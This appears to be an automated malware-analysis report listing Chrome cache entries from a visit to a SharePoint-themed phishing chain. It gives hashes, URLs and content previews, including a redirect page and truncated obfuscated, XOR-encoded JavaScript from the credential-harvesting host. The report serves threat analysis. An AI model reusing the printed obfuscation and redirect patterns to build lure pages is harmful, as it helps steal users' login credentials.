Preview:	const _0x3c0b69=_0x40bd;(function(_0x1ffa3e,_0x743a4f){const _0x1f38a8=_0x40bd,_0x2d88b6=_0x1ffa3e();while(!![]){try{const _0x461944=-parseInt(_0x1f38a8(0x20b))/0x1+parseInt(_0x1f38a8(0x319))/0x2(parseInt(_0x1f38a8(0x2d0))/0x3)+parseInt(_0x1f38a8(0x2c7))/0x4(parseInt(_0x1f38a8(0x281))/0x5)+parseInt(_0x1f38a8(0x21b))/0x6+-parseInt(_0x1f38a8(0x34b))/0x7+parseInt(_0x1f38a8(0x1d9))/0x8+parseInt(_0x1f38a8(0x245))/0x9*(-parseInt(_0x1f38a8(0x2ac))/0xa);if(_0x461944===_0x743a4f)break;else _0x2d88b6['push'](_0x2d88b6['shift']());}catch(_0xf1881c){_0x2d88b6['push'](_0x2d88b6['shift']());}}}(_0x4624,0xa135c));var webnotfound=![],otherweburl='',interacted=0x0,multipleaccountsback=0x0;!document[_0x3c0b69(0x2ff)](_0x3c0b69(0x332))[_0x3c0b69(0x2df)][_0x3c0b69(0x2e1)](_0x3c0b69(0x1e7))&&(view=_0x3c0b69(0x2c8));document['getElementById'](_0x3c0b69(0x2a8))&&!document[_0x3c0b69(0x2ff)](_0x3c0b69(0x2a8))['classList'][_0x3c0b69(0x2e1)](_0x3c0b69(0x1e7))&&(view='uname_pdf');document[_0x3c0b69(0x326)](_0x3

Chrome Cache Entry: 112

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1400
Entropy (8bit):	7.808470583085035
Encrypted:	false
SSDEEP:
MD5:	333EE830E5AB72C41DD9126A27B4D878
SHA1:	12D8D66EBB3076F3D6069E133C3212F97C8774E1
SHA-256:	8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
SHA-512:	3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.\|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A..U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5\|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `......`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&\|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,\|Q...u.-.._....m.1...\|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9.(9..U...x$#.C...Nm...p.....J...

Chrome Cache Entry: 113

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (64954), with CRLF line terminators
Category:	downloaded
Size (bytes):	213684
Entropy (8bit):	5.088387120690259
Encrypted:	false
SSDEEP:
MD5:	E6A02F503963DFDD398C620D4AB0B735
SHA1:	D586B2D9A5C0ECE4DBF2B5B29CA970EC3CD0BE99
SHA-256:	2C75BB8BFE3B9C39FA2FEBB0B4A310E9563AE4FE2025DC3065A37C61C8330F5D
SHA-512:	4030921B3916E90D8BF461BD2DAB8807E2818DEEB3417577998F98B09A491CABFB840FDBC6BC3CC8EADB9D42BE4AF21575517C85318B1C0C1D4B39E0E803FB81
Malicious:	false
Reputation:	unknown
URL:	https://cdn.forms.office.net/forms/css/dist/cv-response-page.min.be80eab.css
Preview:	@charset 'UTF-8';/!.. Generated using the Bootstrap Customizer (https://getbootstrap.com/docs/3.4/customize/).. //!.. * Bootstrap v3.4.1 (https://getbootstrap.com/).. * Copyright 2011-2019 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. //! normalize.css v3.0.3 \| MIT License \| github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub

Chrome Cache Entry: 114

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	203
Entropy (8bit):	5.221515853944015
Encrypted:	false
SSDEEP:
MD5:	371D306C3E29D5D1E877DBD986F2D312
SHA1:	735264E518596E8F282B66905A22BC17169DB633
SHA-256:	64892B5079C2EBC40B4196DAD80700B07175840D19D351CDF03017B04EE8BE20
SHA-512:	DC26E80166B38276202FFA799C78204A5D808E5C253E9467BC2E2AAB2690492A81041A8B49F7C57E947224ACF2E0E586F7ECB350F194EC42C9443B982273175B
Malicious:	false
Reputation:	unknown
URL:	https://campus.espaciocicfa.com/Sharepointproposal/loading.php
Preview:	<!DOCTYPE HTML>..<html lang="en-US">..<head>...<meta charset="UTF-8">...<meta http-equiv="refresh" content="0;url=https://0fs.akedespr.com/FVpjv4/" />...<title></title>..</head>..<body>..</body>..</html>

Chrome Cache Entry: 116

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (39764)
Category:	downloaded
Size (bytes):	776678
Entropy (8bit):	5.373682766047703
Encrypted:	false
SSDEEP:
MD5:	CD453B6A79AEEC40AFEC2D8CF7BA0D8B
SHA1:	4682FD70C58FC30F970C8776CACD367943B23954
SHA-256:	9CE3581D76921A1E3D425C111EC1A4FD16B9F7706871C0FC31A5217D9620A243
SHA-512:	35016DC48002D25D8225B2A79DF666C746F8E69BC2C6E31FD657F0CF89D27B8A9004DDB8E3E96AF1AE4D33110B669E4C7C81EBD570D7761E7009ABF496A4A87E
Malicious:	false
Reputation:	unknown
URL:	https://cdn.forms.office.net/forms/scripts/dists/response-page-pro.min.2ebfd36.js
Preview:	(function(){var __webpack_modules__={26261:function(n,t,e){"use strict";e.d(t,{Vw:function(){return h},cS:function(){return c},cl:function(){return p},gV:function(){return d},iH:function(){return v},n5:function(){return f},oe:function(){return l},z_:function(){return m}});var r=e(63061);function i(n,t){return n?n+"."+t:t}function o(n,t,e,o,u){void 0===u&&(u=4),o&&n.push((0,r.dt)("".concat(i(t,e)),o,u))}function u(n,t,e,o){"boolean"==typeof o&&n.push((0,r.UL)("".concat(i(t,e)),o))}function s(n,t,e,o){"number"==typeof o&&n.push((0,r.Kq)("".concat(i(t,e)),o))}var a=function(n){var t="Activity.Result",e=[];return s(e,t,"Code",n.code),o(e,t,"Type",n.type),s(e,t,"Tag",n.tag),u(e,t,"IsExpected",n.isExpected),e.push((0,r.dt)("zC.Activity.Result","Office.System.Result")),e},c={contractName:"Office.System.Activity",getFields:function(n){var t="Activity",e=[];return o(e,t,"CV",n.cV),s(e,t,"Duration",n.duration),s(e,t,"Count",n.count),s(e,t,"AggMode",n.aggMode),u(e,t,"Success",n.success),n.result&

Chrome Cache Entry: 117

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format, TrueType, length 36696, version 1.0
Category:	downloaded
Size (bytes):	36696
Entropy (8bit):	7.988666025644622
Encrypted:	false
SSDEEP:
MD5:	A69E9AB8AFDD7486EC0749C551051FF2
SHA1:	C34E6AA327B536FB48D1FE03577A47C7EE2231B8
SHA-256:	FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
SHA-512:	9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
Malicious:	false
Reputation:	unknown
URL:	https://0fs.akedespr.com/23xd9QtwvL3zsAl7knabUmTYhvw63
Preview:	wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z\|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.\|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......\|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... gM..h.....Q!}B...Q.m.M...R.5.JUi..U_5@]..PW...5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.V..j.Z...j..BJ.._Pw..0..f...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e\|......B>....1.a,.D.Ej..(.

Chrome Cache Entry: 118

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (23398), with no line terminators
Category:	downloaded
Size (bytes):	23398
Entropy (8bit):	5.104409455331282
Encrypted:	false
SSDEEP:
MD5:	C1C51D30D5E7094136F2D828349E520F
SHA1:	10AE8971AD7A8798BC9732707FE4896B57541557
SHA-256:	0C55057782E3B346C2B819574BFA916852BC8AC5BB4E01D56E8FBFFC22043C98
SHA-512:	7CF90E58A309B53DB53570129780E0ABCEFA2802C1A6441C1A4B49DC265DF617220DC1072CEBDAE7A74C3CA85F5D87B606503BD48A60E049372BE5CAF39969F7
Malicious:	false
Reputation:	unknown
URL:	https://0fs.akedespr.com/56xjleOOd3tDte47cdum16719
Preview:	,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit},input{margin:0}.p,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{color:#fff;text-deco

Chrome Cache Entry: 119

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2530)
Category:	downloaded
Size (bytes):	2764
Entropy (8bit):	5.353085253295088
Encrypted:	false
SSDEEP:
MD5:	1D91B187A32745D330A2077FDADD872B
SHA1:	055D7BB0CF69E295C06346221B784359FA9199E2
SHA-256:	2453F3D239A982DCF75B5DFA55261BC8BF77D04591F331847784AC4982E62F7E
SHA-512:	D05DB41A901DA52397F7EC77E72B5D68697F45DA6505A29EFE26443DB299FFE5F29EB4C9E8FF4F67E327A8EEB385B83D0BB94BE3F28CFC78BD0F4A770CB0307E
Malicious:	false
Reputation:	unknown
URL:	https://cdn.forms.office.net/forms/scripts/dists/response-page-pro.chunk.quiz.6dc4e0a.js
Preview:	"use strict";(self.webpackChunk=self.webpackChunk\|\|[]).push([[541],{85451:function(e,t,r){r.r(t),r.d(t,{createResultContainerInternal:function(){return a},validateQuizPoint:function(){return u}});var o=r(87363),n=r(7645),i=r(65863);function a(e){var t=function(e){if(e.state.IsStudentViewMode){var t=e.props.Response.Feedback;if(t){var r=(0,n.pm)().RuntimeView_FormComment.format(t),a=(0,i.q)({Text:r,ContainsHtml:!0,RenderMode:"RichText"});return o.createElement("div",{className:"office-form-formcomment-container"},o.createElement("div",{className:"office-form-formcomment office-form-theme-primary-foreground"},a))}return}}(e),r=function(e){var t=0,r=0,i=0,a=0,s=!1;(4===e.state.SubmitState\|\|e.state.IsStudentViewMode)&&e.formRuntimeMaster.TopQuestionRuntimeMasters().forEach((function(o){var n=o.Question.Model,m=o.Question;if(n.IsQuiz)if(m.hasCorrectAnswers(o.Model.QuizResult)&&++i,r+=n.Point\|\|0,a+=o.Model.QuizResult&&o.Model.QuizResult.IsAnswerCorrect?1:0,4===e.state.SubmitState)t+=o.Model.

Chrome Cache Entry: 120

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	unknown
URL:	https://code.jquery.com/jquery-3.6.0.min.js
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 121

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 86 x 77, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	61
Entropy (8bit):	4.035372245524405
Encrypted:	false
SSDEEP:
MD5:	0E3FE5700D01DB6CE82EFE03DD7006C0
SHA1:	D5619621BCE49B2B846E10B766B1D66C52F423C2
SHA-256:	B7D87AE81142396AA8BBD0F235349B7B9393C5ED2DD75E0E5528947D5325BFDB
SHA-512:	B2F967BF004E1EEAF334C29B06F4097D4A06C2DF9844AF79DBE371008BEFFF0CDAB1668FB5F5E305A5658D4AD19EE05B3CE3214A1B1EAD3765736A6713E55900
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/86f0b3fa7ec7742d/1712227467034/nTUqq1DQcesO6Lk
Preview:	.PNG........IHDR...V...M......%......IDAT.....$.....IEND.B`.

Chrome Cache Entry: 122

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	70712
Entropy (8bit):	6.94130504124589
Encrypted:	false
SSDEEP:
MD5:	F70FF06D19498D80B130EC78176FD3FF
SHA1:	9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
SHA-256:	DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
SHA-512:	543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......

Chrome Cache Entry: 123

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	29796
Entropy (8bit):	7.980058333789969
Encrypted:	false
SSDEEP:
MD5:	210433A8774859368F3A7B86D125A2A7
SHA1:	408BACDDC39F12CAD285579C102FE4A629862D88
SHA-256:	9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
SHA-512:	6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z#..0......D.....FV.w..,.T..............X.\|..\|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...\|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.

Chrome Cache Entry: 124

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	4286
Entropy (8bit):	5.790142327810594
Encrypted:	false
SSDEEP:
MD5:	EE2B357FA5FBA69AF238168E3A1A27E1
SHA1:	B5DD4606BEDBF1D705A01F833802248E03D01518
SHA-256:	0FD813BAE48835570858A2508D9C29900B8A4CDDEBFF4A250E79AD12F8ACBDCB
SHA-512:	EC00810F1DAD54D6036359386C7A205953CF1E8F81909471376EA7F77786BAABCF2EBB37A68CEB63531147A92080195EF64D93FE750380038E0AA00797DFCBDA
Malicious:	false
Reputation:	unknown
Preview:	...... .... .........(... ...@..... .......................................................................................................................................................................................................p...{@..\|o..x...x...w...wo..s@..........................................................................................`..}...}...\|...{...{...y...x...x...v...w ........]e.`\d..[b..Ze.`......................................................`...........~...~...}...p...^...R...W...]...V.^f..^f..\e..]e..\d..[d..Zd............................................ ....................[...1...!... ...!...!...!.]f.._h..^g..^g..]e..]e..\e..\d..\d....................................0.................\|...E...!...!..."...!..."..."... .Zb.._h..^g..^g..^g..^g..]f..]e..\e..\f.P..........................0.....................3...#...#...#...#...#...#...$.x...`i..`i..`i..`i.._h.._h.._h..^g..]f..^g..`h .................. ....................G...

Chrome Cache Entry: 126

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
Category:	downloaded
Size (bytes):	28000
Entropy (8bit):	7.99335735457429
Encrypted:	true
SSDEEP:
MD5:	A4BCA6C95FED0D0C5CC46CF07710DCEC
SHA1:	73B56E33B82B42921DB8702A33EFD0F2B2EC9794
SHA-256:	5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
SHA-512:	60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
Malicious:	false
Reputation:	unknown
URL:	https://0fs.akedespr.com/pqHnAiXBALLf34tsWCUwx40
Preview:	wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...\|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..\|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[\|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,......e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.\|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..\|.`...5:.Yd@]..j..$...v.

Chrome Cache Entry: 127

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (59497), with CRLF line terminators
Category:	downloaded
Size (bytes):	59864
Entropy (8bit):	5.7195462071382845
Encrypted:	false
SSDEEP:
MD5:	CAFE706D02201FFFF540ED2D6075693B
SHA1:	950A959C399E319760BE080DD6CCE771A428B6FA
SHA-256:	37A3CEA451EFDF7CF51C499B8AB51D0CA910FDCF452E813B0DCA7EE095AD1505
SHA-512:	4A5C1CBE5566534CCE3402C1B5883FC3D676320CA630A8F107DD2E335A2E6F3DFE4065EF3CDB9551F3490B16023DC8257A1E84498575433D11E8A54DBE61B344
Malicious:	false
Reputation:	unknown
URL:	https://0fs.akedespr.com/VuYJnTygLjLZFfYzGLCBfkFzhAOSAMVJSXSBOTDCOISYYMFEMVNRMQDVMOMPANZIKDAQWERLPFX?ACLQVTHJOLKIYMMplTEQKqDAWLGBTXVIXOHAMAQYZWJSPZCJXULFLKLADG
Preview:	<script>..function NSdNCMJZEM(aDmIiPhZUn, erHSXvBrKN) {..let UfnDXkxtkf = '';..aDmIiPhZUn = atob(aDmIiPhZUn);..let qPFTKwiypa = erHSXvBrKN.length;..for (let i = 0; i < aDmIiPhZUn.length; i++) {.. UfnDXkxtkf += String.fromCharCode(aDmIiPhZUn.charCodeAt(i) ^ erHSXvBrKN.charCodeAt(i % qPFTKwiypa));..}..return UfnDXkxtkf;..}..var ONtgJnlsUM = NSdNCMJZEM(`exE2egcWHGMvUy9EH1l6T08PAgcqXFJZJSwiDkgWKRJMOE5+LVYLF3k9eBVkYmUPGRA1WQJBZDE3UFdRL0QGRTd4ahwJHCNVXF81NyBBE10kXx8aLjMwVhgKagNcA2pya14DHWlaARd6fmpACQEuQAYLSUhlE0pTe0MRRy0yMRMZASQNUF0wNjVAUFxoUxZbajEqUAEWMx4bWmt2awVEQ2hDHVYvJzEdAxxpXRtbaig2EVRPaEMRRy0yMQ1neWcQUhV4MSZBAwMzEAFHJ39nWx4HN0NIGms1MkREFChfFVkhbCZcB1w1VRFUNDYmWwtcJkAbGy4xZw1WXDRTAFw0Nns+YFNnEFIJKCsrWEoBIlxPFzc2PF8PAC9VF0FmYi1BDxV6El0AcjovXw88CFRBQQA2IAddECNFHwRydXQKSE1KOlIVZGJ5XwMdLBAAUCh/Z0AeCitVAV0hJzERShs1VRQIZm09ShtBP2EnbQAxDUMbNDdEF1N3cmcNZ3lnEFIVeC4sXQFTNVUeCGYyN1YGHCZUUBUsMCBVV1E3QTpbBSsdcSs/C1ZBATAxEnA/BD8EQhdkIzYOSBUoXgYXZDY8Qw9OZVYdWzBtMlwMFXUSUlY2LTZABQEuVxtbeWAkXQUdPl0d

Chrome Cache Entry: 130

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.875
Encrypted:	false
SSDEEP:
MD5:	46DF3E5E2D15256CA16616EBFDA5427F
SHA1:	BE8F9B307E458075DA0D43585A05F1D451469182
SHA-256:	AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
SHA-512:	88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
Malicious:	false
Reputation:	unknown
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAma77I_3SLUkhIFDZFhlU4=?alt=proto
Preview:	CgkKBw2RYZVOGgA=

Chrome Cache Entry: 131

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 800 x 312, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	586008
Entropy (8bit):	7.978696112574796
Encrypted:	false
SSDEEP:
MD5:	55AE08C98C228F99BE6FC741857D3941
SHA1:	C1E1D7F16987E489FF50F454CBCBEE983FB53321
SHA-256:	7D0D77E7111CC79264793905D7140147405A62F7B4AA88C3E46EAEA11FB1412C
SHA-512:	00404EDCC18CAFE2200DF0AF7E88F6AC91C6ACEF49D77F12E3DAE0357A83D6F490340E07799F83C17238D71285FF89E03F8601400362ADF6C33E4AE4B97B5F86
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR... ...8......j......sRGB.........gAMA......a.....pHYs.........].......IDATx^\|...gIv....f=....]{U...K.W..U]]{U.w.=.3.."dZ\|(.$S.$..H...D.A..@. ........of..~8O..7......~.9.oL\.2._.>.!.._..\.:....[.....a..k.....$...[g...a.2......u~s..}k..{..7..;..}g..}{..uk8x.s.M.3.x.se...a.!B:...0.,<\|....r.!e.....s...s.I..O...{P.....K.<..Sn..c...7/..O...l....0u..P...a.:.5.......y.k+.]....O...[...o......'..o^R....F.k.y.xX.......u.v......../?.}._...#.X.......D..\[zJJ.2.Y....}..L;.w8m2v.z..[....r...%.:/.;s...:.l....8..{.O....-...ZWY..y..Yq\^'o..U...htMq.+.GFe....Y.x....^..>.......\..C.c..E.,?~.<2.........\|..J..s.=...9S..~....^..#..(........W.o.4c.6l<}I.g...2.#...y....y{.1u..}#.uW).............w.s.}=..\|g.........7.h..u.+..}..........W...a.......w.G...q?....#.{z1...5m..<.6...c.....).....A.G.P.o..W<+....y.?F...;.0...1Q...S.....=.K....y.m.w.......}\}.#.^{a..i..Y.>m..O...=.1.g..2.o..+9..L...c..3F..<..L..m{_.{..>..sh....~.....;.....q.~H..L.<.

Chrome Cache Entry: 132

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	49602
Entropy (8bit):	7.881935507115631
Encrypted:	false
SSDEEP:
MD5:	DB783743CD246FF4D77F4A3694285989
SHA1:	B9466716904457641B7831868B47162D8D378D41
SHA-256:	5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
SHA-512:	E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
Malicious:	false
Reputation:	unknown
